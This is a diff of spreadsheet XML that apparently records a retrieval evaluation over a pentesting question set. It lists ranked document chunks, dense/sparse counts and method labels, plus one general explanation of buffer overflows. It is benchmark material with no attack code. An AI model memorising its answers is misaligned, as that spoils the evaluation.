       </c>
     </row>
@@ -11396,18 +11374,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 3ce003fc-f967-479a-be9c-461f49ad3c11, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I163" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J163" t="n">
@@ -11415,7 +11393,7 @@
       </c>
       <c r="K163" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11465,7 +11443,7 @@
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
@@ -11474,7 +11452,7 @@
       </c>
       <c r="I164" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J164" t="n">
@@ -11482,7 +11460,7 @@
       </c>
       <c r="K164" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11533,7 +11511,7 @@
       <c r="H165" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)
@@ -11541,12 +11519,12 @@
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I165" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J165" t="n">
@@ -11554,7 +11532,7 @@
       </c>
       <c r="K165" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11621,7 +11599,7 @@
       </c>
       <c r="K166" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11656,7 +11634,7 @@
       <c r="F167" t="inlineStr">
         <is>
           <t>Answer: Memory corruption
-Explanation: A buffer overflow attack involves writing data beyond the boundaries of a memory buffer, which can lead to memory corruption. This vulnerability is most likely to be exploited by a buffer overflow attack as it allows an attacker to execute arbitrary code on the affected system. Input validation errors and cross-site scripting are related to improper input handling, but they do not directly involve memory corruption or buffer overflows. Side-channel attacks focus on gaining information from the implementation of a system rather than exploiting buffer overflow vulnerabilities.</t>
+Explanation: A buffer overflow attack involves writing data beyond the intended space of a buffer, which can lead to memory corruption. This vulnerability is most likely to be exploited by a buffer overflow attack as it allows an attacker to execute arbitrary code or crash the system. Input validation errors and cross-site scripting are related to improper input handling, while side-channel attacks focus on gaining information from the implementation of a system rather than directly corrupting memory or control flow within an application's process.</t>
         </is>
       </c>
       <c r="G167" t="inlineStr">
@@ -11667,20 +11645,20 @@
       <c r="H167" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 37f43b1b-776c-4ad7-a565-c62d5b4c3832, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I167" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J167" t="n">
@@ -11688,7 +11666,7 @@
       </c>
       <c r="K167" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11736,18 +11714,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 2284c68d-f358-4abf-bedb-673c5c8ca0d7, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: sparse, Rank: 7)
 cowWhySo-pentest-redteam-steering.md (Chunk: 07d86e21-75c1-4d1f-9cfa-6963e9e531cd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I168" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J168" t="n">
@@ -11755,7 +11733,7 @@
       </c>
       <c r="K168" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11801,20 +11779,20 @@
       <c r="H169" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8563d025-3930-45a0-b79e-535960ea51b3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 8563d025-3930-45a0-b79e-535960ea51b3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I169" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J169" t="n">
@@ -11822,7 +11800,7 @@
       </c>
       <c r="K169" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11868,20 +11846,20 @@
       <c r="H170" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I170" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J170" t="n">
@@ -11889,7 +11867,7 @@
       </c>
       <c r="K170" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11964,7 +11942,7 @@
       </c>
       <c r="K171" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12031,7 +12009,7 @@
       </c>
       <c r="K172" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12082,15 +12060,15 @@
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I173" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J173" t="n">
@@ -12098,7 +12076,7 @@
       </c>
       <c r="K173" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12146,18 +12124,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I174" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J174" t="n">
@@ -12165,7 +12143,7 @@
       </c>
       <c r="K174" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12211,20 +12189,20 @@
       <c r="H175" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I175" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J175" t="n">
@@ -12232,7 +12210,7 @@
       </c>
       <c r="K175" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12281,17 +12259,17 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I176" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J176" t="n">
@@ -12299,7 +12277,7 @@
       </c>
       <c r="K176" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12352,13 +12330,13 @@
 preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I177" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J177" t="n">
@@ -12366,7 +12344,7 @@
       </c>
       <c r="K177" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12412,20 +12390,20 @@
       <c r="H178" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 664f7dd6-24a1-4cd8-9bb1-de9e98a49ce6, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I178" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J178" t="n">
@@ -12433,7 +12411,7 @@
       </c>
       <c r="K178" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -12483,16 +12461,16 @@
 preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 9)
